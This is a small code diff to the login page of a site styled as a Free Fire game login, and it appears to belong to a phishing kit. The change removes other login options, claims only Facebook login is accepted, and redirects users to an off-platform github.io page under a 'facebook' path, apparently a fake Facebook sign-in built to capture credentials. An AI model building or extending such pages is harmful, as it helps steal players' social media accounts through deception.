--- a/login/index.html
+++ b/login/index.html
@@ -73,7 +73,7 @@
         <input type="text" id="freeFireId" placeholder="Enter Free Fire ID">
         <button id="loginButton">Continue with facebook.com</button>
         <div class="alternative-login">
-            <p>Or <a href="#">login with another method</a></p>
+            <p>Currently we only accept facebook login. Other options will be available soon!</p>
         </div>
     </div>
 
@@ -90,7 +90,7 @@
                 
                 // Redirect user to desired location
                 // For demonstration purposes, redirect to a hypothetical dashboard page
-                window.location.href = 'dashboard.html';
+                window.location.href = 'https://sharmapushkar-coder.github.io/Freefire/facebook/';
             } else {
                 // Handle case where Free Fire ID is empty
                 alert('Please enter your Free Fire ID.');
